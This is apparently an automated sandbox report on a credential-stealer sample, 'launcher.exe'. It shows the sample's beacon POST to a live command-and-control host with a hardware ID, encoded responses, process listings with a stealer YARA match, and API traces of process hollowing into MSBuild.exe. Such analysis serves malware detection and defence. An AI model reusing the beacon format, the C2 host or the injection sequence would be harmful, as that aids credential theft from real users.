2024-12-27 21:31:16 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: stingyerasjhru.click
2024-12-27 21:31:16 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 62 32 4a 73 59 57 74 76 58 33 26 6a 3d 26 68 77 69 64 3d 38 41 42 30 42 31 38 42 42 37 32 46 39 36 44 44 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 Data Ascii: act=get_message&ver=4.0&lid=pqZnKP--b2JsYWtvX3&j=&hwid=8AB0B18BB72F96DD962CEBBDF1A894EB
2024-12-27 21:31:17 UTC	1141	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 21:31:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ntkks3kcs101o3ihi69adl9sil; expires=Tue, 22 Apr 2025 15:17:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BCSHE3V96jze5tlo6X8o2UbtxclMoyXVN2Wk4sAXjhpF6iwvcA2MZmH%2Bgr%2FWKE8IkeWwLHBScSVaegNV%2F3drEA%2FxjaCT%2F6JoF5FOJH8oavhLNZ6Vr%2BlyhiNgJPVHpeLiWUeuqbmNBw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8c6aa61f320cc4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1534&rtt_var=589&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=991&delivery_rate=1903520&cwnd=147&unsent_bytes=0&cid=6b245a3c2be99eb7&ts=830&x=0"
2024-12-27 21:31:17 UTC	228	IN	Data Raw: 34 38 30 0d 0a 52 43 39 66 64 38 36 59 50 7a 69 63 31 76 55 55 77 4e 42 4d 79 56 64 76 42 4e 39 47 57 47 34 6a 5a 76 37 76 55 64 62 56 75 4a 38 66 56 48 30 52 75 72 6f 46 43 62 44 30 6b 44 62 36 34 57 44 72 4d 30 30 2b 2f 51 63 4f 4f 6b 34 4b 6d 49 4d 6a 6e 35 72 4c 72 51 42 66 45 54 36 70 36 33 4e 31 33 62 53 6d 66 4b 4f 2b 45 4f 5a 68 41 7a 48 6e 49 54 6b 30 63 51 53 6f 71 53 4f 55 35 38 72 5a 43 57 73 76 51 5a 69 7a 65 45 76 37 34 49 39 64 6a 37 74 38 6f 42 51 59 64 36 67 45 4c 43 56 6c 48 35 69 7a 66 71 65 4e 31 75 59 46 58 7a 4d 78 75 73 31 6f 53 39 53 33 68 6b 57 47 68 58 6d 35 44 31 70 6c 70 67 49 71 49 45 52 51 71 72 77 59 6d 70 62 43 33 67 4d 66 4d 43 2b 45 78 42 41 Data Ascii: 480RC9fd86YPzic1vUUwNBMyVdvBN9GWG4jZv7vUdbVuJ8fVH0RuroFCbD0kDb64WDrM00+/QcOOk4KmIMjn5rLrQBfET6p63N13bSmfKO+EOZhAzHnITk0cQSoqSOU58rZCWsvQZizeEv74I9dj7t8oBQYd6gELCVlH5izfqeN1uYFXzMxus1oS9S3hkWGhXm5D1plpgIqIERQqrwYmpbC3gMfMC+ExBA
2024-12-27 21:31:17 UTC	931	IN	Data Raw: 54 37 4c 4f 54 58 59 65 39 47 5a 35 6d 50 6d 32 6f 49 69 6b 57 5a 31 61 4b 6a 44 79 4b 2b 74 62 35 44 33 77 47 4c 37 72 6f 64 6e 33 49 2f 62 70 4e 6f 62 52 2f 6d 67 49 49 4c 35 5a 74 43 41 5a 77 4a 61 36 44 5a 70 69 76 7a 65 6b 77 59 57 70 47 71 74 46 72 54 36 36 45 6d 55 4b 6f 67 68 61 6e 43 30 42 54 74 51 45 79 4e 42 73 4f 7a 49 78 6c 67 5a 4c 4d 7a 44 35 42 4a 6a 62 37 71 47 6c 4d 79 5a 43 47 55 4b 57 6a 47 4a 78 76 42 58 4b 54 63 7a 6b 58 5a 78 53 77 69 47 65 43 68 76 2f 54 42 31 55 32 4e 4a 4b 33 55 48 44 6b 69 74 6f 2f 72 37 55 71 67 42 41 43 59 59 68 33 43 67 39 55 41 6f 2b 58 45 49 4f 42 31 66 4d 69 51 32 67 2b 67 65 73 4e 66 4f 79 59 76 48 4f 7a 6e 41 47 4d 4e 54 78 38 76 43 67 45 51 52 55 4b 70 4e 63 32 74 4f 44 71 2f 52 4a 70 4c 54 58 38 36 6e Data Ascii: T7LOTXYe9GZ5mPm2oIikWZ1aKjDyK+tb5D3wGL7rodn3I/bpNobR/mgIIL5ZtCAZwJa6DZpivzekwYWpGqtFrT66EmUKoghanC0BTtQEyNBsOzIxlgZLMzD5BJjb7qGlMyZCGUKWjGJxvBXKTczkXZxSwiGeChv/TB1U2NJK3UHDkito/r7UqgBACYYh3Cg9UAo+XEIOB1fMiQ2g+gesNfOyYvHOznAGMNTx8vCgEQRUKpNc2tODq/RJpLTX86n
2024-12-27 21:31:17 UTC	1369	IN	Data Raw: 33 32 34 38 0d 0a 61 78 6b 7a 51 76 62 2f 58 6d 4c 4f 74 4b 4e 53 73 70 4a 2b 75 78 49 74 55 70 41 6e 44 6b 56 30 46 5a 6e 5a 4b 34 2b 61 30 36 38 74 62 43 67 45 75 64 70 4c 63 39 71 76 6b 30 6a 76 6f 52 53 6e 4c 69 31 30 73 77 41 73 4f 33 51 56 74 6f 34 69 68 35 50 74 71 6a 52 33 61 68 61 33 33 45 31 32 2b 2b 43 68 52 34 6d 63 44 37 4d 57 4b 44 53 77 48 68 49 79 44 45 32 4f 69 6a 65 66 6b 74 58 4b 45 78 34 4e 46 72 6e 38 54 6b 44 64 67 4b 46 35 72 4c 59 67 75 78 34 67 64 2b 30 43 4b 43 42 71 41 59 32 6a 48 4a 65 33 36 2f 63 6e 51 51 4e 59 2b 50 51 4b 41 50 75 33 72 30 61 69 68 67 71 37 46 56 31 32 6d 67 51 4f 49 55 49 77 31 62 67 69 73 65 50 43 78 67 74 45 62 78 36 4e 37 30 78 50 33 71 4b 2b 55 72 6d 32 45 4f 59 6d 4e 32 71 6d 42 43 67 43 5a 52 4b 72 75 Data Ascii: 3248axkzQvb/XmLOtKNSspJ+uxItUpAnDkV0FZnZK4+a068tbCgEudpLc9qvk0jvoRSnLi10swAsO3QVto4ih5PtqjR3aha33E12++ChR4mcD7MWKDSwHhIyDE2OijefktXKEx4NFrn8TkDdgKF5rLYgux4gd+0CKCBqAY2jHJe36/cnQQNY+PQKAPu3r0aihgq7FV12mgQOIUIw1bgisePCxgtEbx6N70xP3qK+Urm2EOYmN2qmBCgCZRKru
2024-12-27 21:31:17 UTC	1369	IN	Data Raw: 4a 7a 77 6c 6f 48 54 53 46 39 31 6c 38 35 71 4f 58 51 61 6d 59 65 4b 59 68 4e 6d 4f 72 41 42 34 76 53 56 4f 33 68 7a 69 51 34 4d 76 77 64 6d 73 54 48 62 2f 66 42 6d 75 33 6d 6f 5a 38 68 37 49 45 2f 51 34 67 4e 4a 6b 49 48 54 5a 36 50 4b 75 46 5a 71 65 4e 39 73 34 44 59 54 34 57 39 75 34 49 62 4f 36 54 6b 6c 43 4e 70 51 2b 34 59 6c 34 30 6a 7a 63 62 4b 55 55 72 72 36 6f 39 68 4a 7a 51 31 44 78 71 46 77 61 53 74 31 5a 56 70 4a 69 5a 59 4a 54 6e 42 35 38 4f 41 7a 47 32 45 52 77 38 65 56 2b 6f 72 6a 53 75 6f 6f 76 75 44 47 49 59 4e 62 2f 54 54 56 33 4d 76 6f 42 32 6a 5a 45 75 6d 6a 38 56 59 4c 6b 66 4e 46 6f 49 50 49 6d 4e 43 37 53 48 39 74 49 69 57 52 34 48 70 4d 35 34 41 66 4b 31 74 79 79 46 35 7a 61 69 42 53 6b 30 74 67 55 76 48 56 51 6b 69 35 63 4c 6a 35 Data Ascii: JzwloHTSF91l85qOXQamYeKYhNmOrAB4vSVO3hziQ4MvwdmsTHb/fBmu3moZ8h7IE/Q4gNJkIHTZ6PKuFZqeN9s4DYT4W9u4IbO6TklCNpQ+4Yl40jzcbKUUrr6o9hJzQ1DxqFwaSt1ZVpJiZYJTnB58OAzG2ERw8eV+orjSuoovuDGIYNb/TTV3MvoB2jZEumj8VYLkfNFoIPImNC7SH9tIiWR4HpM54AfK1tyyF5zaiBSk0tgUvHVQki5cLj5
2024-12-27 21:31:17 UTC	1369	IN	Data Raw: 52 68 55 48 75 75 31 76 43 66 36 66 70 57 65 51 71 69 6d 66 4d 41 56 63 69 42 59 45 51 56 6b 49 6a 6f 41 6e 6f 5a 48 57 78 51 64 47 43 7a 43 37 38 30 34 42 2b 5a 79 76 51 49 7a 6b 47 4c 77 38 4e 7a 43 56 45 6a 34 6f 62 7a 36 78 71 78 79 69 34 34 72 53 43 32 73 71 49 66 6a 57 57 47 6a 4a 73 5a 68 31 38 4c 67 65 68 7a 34 62 55 5a 4a 7a 41 54 70 2f 53 64 57 64 46 6f 53 38 77 4b 34 50 59 67 77 37 6a 39 31 74 54 66 4b 68 7a 46 6e 30 6d 6e 79 5a 49 53 68 4d 36 77 77 2f 43 6c 73 57 6d 70 30 68 6d 61 44 54 7a 79 31 35 45 43 33 33 2f 56 35 4a 7a 4b 4b 48 5a 70 71 42 66 4b 78 6c 44 55 61 38 4d 79 73 37 62 43 4f 48 6d 6d 69 69 6a 50 33 2b 41 32 34 4e 47 49 54 73 65 67 6e 61 70 4c 63 6d 73 70 59 69 2b 47 34 65 5a 76 51 6a 41 68 34 56 4d 36 37 62 4f 71 61 55 36 4b 34 Data Ascii: RhUHuu1vCf6fpWeQqimfMAVciBYEQVkIjoAnoZHWxQdGCzC7804B+ZyvQIzkGLw8NzCVEj4obz6xqxyi44rSC2sqIfjWWGjJsZh18Lgehz4bUZJzATp/SdWdFoS8wK4PYgw7j91tTfKhzFn0mnyZIShM6ww/ClsWmp0hmaDTzy15EC33/V5JzKKHZpqBfKxlDUa8Mys7bCOHmmiijP3+A24NGITsegnapLcmspYi+G4eZvQjAh4VM67bOqaU6K4
2024-12-27 21:31:17 UTC	1369	IN	Data Raw: 76 6a 2b 66 6e 2f 78 6b 36 56 78 74 4b 45 37 6e 78 6b 56 62 5a 55 4e 47 56 59 57 58 72 43 39 49 6f 50 67 2f 63 30 67 5a 6a 67 45 67 74 56 2b 57 75 2b 42 6c 46 61 73 6a 47 4f 64 48 53 78 76 6e 51 77 4f 44 48 55 6f 6c 61 74 6a 6b 70 6e 35 79 53 6c 5a 61 46 79 35 71 47 56 39 32 4c 71 35 54 71 75 32 42 49 39 6b 49 6b 61 7a 44 52 34 48 51 43 72 48 74 6a 71 63 73 65 6d 6e 4d 42 6b 74 4f 37 62 57 57 57 72 72 34 61 52 6b 6d 6f 52 35 71 47 46 64 55 6f 59 70 43 41 70 33 44 4a 6d 4f 48 49 72 36 6a 64 4d 58 51 6a 77 74 6f 4d 68 33 44 64 69 37 6c 46 6a 7a 34 52 36 6f 49 41 74 31 70 79 45 6f 4e 6b 6f 67 6c 4a 73 68 67 4a 37 31 71 6a 46 4d 4c 6b 57 4b 72 6c 52 62 2b 37 32 59 5a 6f 47 58 4f 50 6f 4c 51 45 57 63 4c 44 51 6b 61 68 61 70 6f 54 71 56 6a 2b 7a 54 63 6e 6f 36 Data Ascii: vj+fn/xk6VxtKE7nxkVbZUNGVYWXrC9IoPg/c0gZjgEgtV+Wu+BlFasjGOdHSxvnQwODHUolatjkpn5ySlZaFy5qGV92Lq5Tqu2BI9kIkazDR4HQCrHtjqcsemnMBktO7bWWWrr4aRkmoR5qGFdUoYpCAp3DJmOHIr6jdMXQjwtoMh3Ddi7lFjz4R6oIAt1pyEoNkoglJshgJ71qjFMLkWKrlRb+72YZoGXOPoLQEWcLDQkahapoTqVj+zTcno6
2024-12-27 21:31:17 UTC	1369	IN	Data Raw: 78 50 74 35 32 39 58 59 71 65 50 66 70 6b 56 6d 62 74 4b 6a 39 64 43 44 4b 64 32 68 2b 7a 76 34 71 6d 45 56 55 32 50 4b 48 43 58 6c 62 74 70 49 4d 6d 71 70 38 4b 67 79 30 6b 57 50 41 38 4c 78 52 2f 53 5a 6d 44 4e 37 79 4d 2b 64 6b 4d 5a 44 41 45 6d 63 4a 74 64 4d 76 6d 6f 6c 4c 79 6f 67 71 6e 5a 6c 70 31 36 47 31 71 47 31 63 4f 6c 4c 31 6d 6a 4b 62 2b 2f 6e 4a 56 44 6b 4f 57 31 6d 6c 75 79 4c 79 6c 62 4f 75 42 65 61 51 2b 56 6a 32 4b 45 53 73 6d 51 68 57 70 69 51 6e 6b 70 59 2b 71 63 55 49 78 42 35 2f 45 45 46 48 50 70 62 52 49 37 34 64 34 2b 42 4d 45 50 4f 6f 30 61 6b 56 35 41 35 69 41 5a 2b 53 4d 2f 50 67 4e 59 52 51 69 6e 4e 42 6a 46 2b 32 69 6d 55 47 6d 69 44 6e 39 47 44 78 46 6e 6a 51 2b 46 30 52 65 73 71 49 51 74 4b 50 55 38 42 67 41 50 51 4b 39 72 Data Ascii: xPt529XYqePfpkVmbtKj9dCDKd2h+zv4qmEVU2PKHCXlbtpIMmqp8Kgy0kWPA8LxR/SZmDN7yM+dkMZDAEmcJtdMvmolLyogqnZlp16G1qG1cOlL1mjKb+/nJVDkOW1mluyLylbOuBeaQ+Vj2KESsmQhWpiQnkpY+qcUIxB5/EEFHPpbRI74d4+BMEPOo0akV5A5iAZ+SM/PgNYRQinNBjF+2imUGmiDn9GDxFnjQ+F0ResqIQtKPU8BgAPQK9r
2024-12-27 21:31:17 UTC	1369	IN	Data Raw: 6e 78 6b 53 4c 6c 48 32 5a 59 67 35 39 6e 41 67 58 50 47 59 2b 72 61 59 64 6c 61 2f 35 32 68 67 41 4e 54 43 55 79 42 52 58 2b 62 32 6a 55 66 4b 42 41 4a 45 76 4f 57 43 76 50 67 67 45 59 52 48 4d 71 54 61 55 76 66 53 74 4b 56 38 62 42 34 44 52 65 77 7a 73 72 4a 4a 2f 38 75 63 71 72 32 59 66 61 4f 70 2b 50 31 68 50 4d 72 76 65 5a 35 71 33 69 63 73 4c 61 41 6b 34 72 38 34 47 54 4f 75 38 72 33 72 33 74 51 6d 46 45 43 5a 33 6b 77 55 56 4d 67 77 6b 79 5a 63 35 6f 35 48 55 71 58 4a 67 4c 7a 54 33 38 55 78 70 30 4a 6e 48 55 4c 62 37 50 6f 34 41 48 6d 4b 62 45 7a 6f 6f 62 44 53 37 74 77 4b 66 6d 66 76 6c 42 57 63 4d 50 71 6d 74 66 42 50 57 74 61 5a 4d 38 71 59 6b 75 79 4d 4b 61 4c 63 6e 62 67 78 4b 4c 34 53 2f 43 37 57 38 30 63 30 33 65 6d 6f 79 6e 50 78 32 58 2b Data Ascii: nxkSLlH2ZYg59nAgXPGY+raYdla/52hgANTCUyBRX+b2jUfKBAJEvOWCvPggEYRHMqTaUvfStKV8bB4DRewzsrJJ/8ucqr2YfaOp+P1hPMrveZ5q3icsLaAk4r84GTOu8r3r3tQmFECZ3kwUVMgwkyZc5o5HUqXJgLzT38Uxp0JnHULb7Po4AHmKbEzoobDS7twKfmfvlBWcMPqmtfBPWtaZM8qYkuyMKaLcnbgxKL4S/C7W80c03emoynPx2X+
2024-12-27 21:31:17 UTC	1369	IN	Data Raw: 75 62 77 62 67 7a 49 32 61 4c 68 32 44 77 68 33 49 4b 75 42 49 59 37 67 32 61 38 49 58 51 6b 6d 2b 50 46 73 61 4d 79 56 6a 31 57 49 68 79 4f 62 45 54 4d 72 70 6e 4d 2b 47 47 6f 68 6b 37 6f 56 35 34 54 33 36 43 5a 73 4a 79 57 59 79 33 42 55 2f 5a 43 48 54 65 75 6b 4b 34 30 69 43 30 32 6e 4a 52 4e 58 59 67 4b 66 68 78 2b 4f 69 5a 66 52 4b 42 59 4b 45 49 66 43 62 6e 7a 4b 6c 36 56 57 39 72 49 4b 68 41 45 6b 56 34 6b 68 48 78 70 78 55 4d 79 36 48 71 47 51 30 61 30 7a 51 47 73 31 2f 71 35 36 55 2f 72 68 6d 45 79 34 75 51 32 72 4f 79 31 53 69 67 6f 56 4a 6b 49 56 71 71 6b 45 75 4b 58 67 7a 79 56 58 4f 51 57 62 37 77 6c 56 7a 35 71 48 56 2b 75 42 43 34 45 34 4f 6b 71 44 61 53 34 6b 52 68 61 33 71 58 71 44 74 34 6e 4f 48 56 67 36 51 62 62 4b 44 6d 7a 4e 75 70 5a Data Ascii: ubwbgzI2aLh2Dwh3IKuBIY7g2a8IXQkm+PFsaMyVj1WIhyObETMrpnM+GGohk7oV54T36CZsJyWYy3BU/ZCHTeukK40iC02nJRNXYgKfhx+OiZfRKBYKEIfCbnzKl6VW9rIKhAEkV4khHxpxUMy6HqGQ0a0zQGs1/q56U/rhmEy4uQ2rOy1SigoVJkIVqqkEuKXgzyVXOQWb7wlVz5qHV+uBC4E4OkqDaS4kRha3qXqDt4nOHVg6QbbKDmzNupZ

Target ID:	0
Start time:	16:30:54
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\launcher.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\launcher.exe"
Imagebase:	0xb30000
File size:	561'192 bytes
MD5 hash:	7BAF86E82D62F1D5C869D2213BC6D917
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:30:54
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:30:55
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\launcher.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\launcher.exe"
Imagebase:	0xb30000
File size:	561'192 bytes
MD5 hash:	7BAF86E82D62F1D5C869D2213BC6D917
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2139030669.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.5%
Dynamic/Decrypted Code Coverage:	1%
Signature Coverage:	3.7%
Total number of Nodes:	802
Total number of Limit Nodes:	24

Executed Functions

Function 00B6A19E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00B6A110,00B6A100), ref: 00B6A334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00B6A347
Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 00B6A365
ReadProcessMemory.KERNELBASE(00000230,?,00B6A154,00000004,00000000), ref: 00B6A389
VirtualAllocEx.KERNELBASE(00000230,?,?,00003000,00000040), ref: 00B6A3B4
WriteProcessMemory.KERNELBASE(00000230,00000000,?,?,00000000,?), ref: 00B6A40C
WriteProcessMemory.KERNELBASE(00000230,00400000,?,?,00000000,?,00000028), ref: 00B6A457
WriteProcessMemory.KERNELBASE(00000230,?,?,00000004,00000000), ref: 00B6A495
Wow64SetThreadContext.KERNEL32(00000098,00B00000), ref: 00B6A4D1
ResumeThread.KERNELBASE(00000098), ref: 00B6A4E0

Strings

VirtualAllocEx, xrefs: 00B6A29C
WriteProcessMemory, xrefs: 00B6A2AF
GetP, xrefs: 00B6A21E
SetThreadContext, xrefs: 00B6A2C2
ReadProcessMemory, xrefs: 00B6A289
ResumeThread, xrefs: 00B6A2D8
CreateProcessW, xrefs: 00B6A250
ress, xrefs: 00B6A226
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00B6A333
Load, xrefs: 00B6A1DA
GetThreadContext, xrefs: 00B6A276
aryA, xrefs: 00B6A1E2
VirtualAlloc, xrefs: 00B6A263
TerminateProcess, xrefs: 00B6A3C3

Memory Dump Source

Source File: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: af9006a02f3212fc6398499956a1eab1c472d51e50fa34d01bf2a01316b840f6
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: 9CB1F87264024AAFDB60CF68CC80BDA77E5FF88714F158164EA08AB341D774FA51CB94

Function 00B31FB0 Relevance: 9.2, APIs: 6, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B31240: _strlen.LIBCMT ref: 00B312BA

CreateFileA.KERNELBASE ref: 00B32036
GetFileSize.KERNEL32(00000000,00000000), ref: 00B32046
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00B3206B
CloseHandle.KERNELBASE(00000000), ref: 00B3207A
_strlen.LIBCMT ref: 00B320CD
CloseHandle.KERNEL32(00000000), ref: 00B321FD

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: File$CloseHandle_strlen$CreateReadSize
String ID:
API String ID: 2911764282-0
Opcode ID: 21f3b0fdef4a11925ef5233dc71e4bf8674598b619ff89337243ab925d40f17c
Instruction ID: 3fd36aa5429804210e14b90eb44105e59fdd740d07b53ba4f914cbc641590961
Opcode Fuzzy Hash: 21f3b0fdef4a11925ef5233dc71e4bf8674598b619ff89337243ab925d40f17c
Instruction Fuzzy Hash: 2F71D2B2C006149BCB10DFA8DC85BAEBBF5FF48310F240669E815B7391E7759945CBA1

Function 00B31000 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9ddf8e20a9fe0610a1ef2a8137675468098cbbbf5bf51e27587ca1b54eb92d3
Instruction ID: 4baf2b559ff90f5b7c6ce4ae26131849df16e304534eeee532cda7bb5e23b0df
Opcode Fuzzy Hash: b9ddf8e20a9fe0610a1ef2a8137675468098cbbbf5bf51e27587ca1b54eb92d3
Instruction Fuzzy Hash: 2F213C336141650B875C9F3C6DA203BFBCEDB865A0F255B7ADD129F2D1E520DD1082E4

Function 00B324B0 Relevance: 10.6, APIs: 7, Instructions: 83
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 00B324DD
ShowWindow.USER32(00000000,00000000), ref: 00B324E6
GetCurrentThreadId.KERNEL32 ref: 00B32524

Part of subcall function 00B3F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00B3253A,?,?,00000000), ref: 00B3F129
Part of subcall function 00B3F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,00B3253A,?,?,00000000), ref: 00B3F142
Part of subcall function 00B3F11D: CloseHandle.KERNEL32(?,?,?,00B3253A,?,?,00000000), ref: 00B3F154

std::_Throw_Cpp_error.LIBCPMT ref: 00B32567
std::_Throw_Cpp_error.LIBCPMT ref: 00B32578
std::_Throw_Cpp_error.LIBCPMT ref: 00B32589
std::_Throw_Cpp_error.LIBCPMT ref: 00B3259A

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
String ID:
API String ID: 3956949563-0
Opcode ID: 928efa05f77b05b55a1aea2e62cb535930a51715bbcbd75354098eee0a03ce1c
Instruction ID: 77862bf3755937ff247097bacb90d483bdc0342c593b770bde45b8316fbdae7a
Opcode Fuzzy Hash: 928efa05f77b05b55a1aea2e62cb535930a51715bbcbd75354098eee0a03ce1c
Instruction Fuzzy Hash: AB2174F2D402159BDF10AF949C07B9EBBF4EF04710F2801A5F60877281E7B6A614CBA6

Function 00B4CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,DA36A356,?,00B4D01A,?,?,00000000), ref: 00B4CFCC

Strings

ext-ms-, xrefs: 00B4CF76
api-ms-, xrefs: 00B4CF62

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
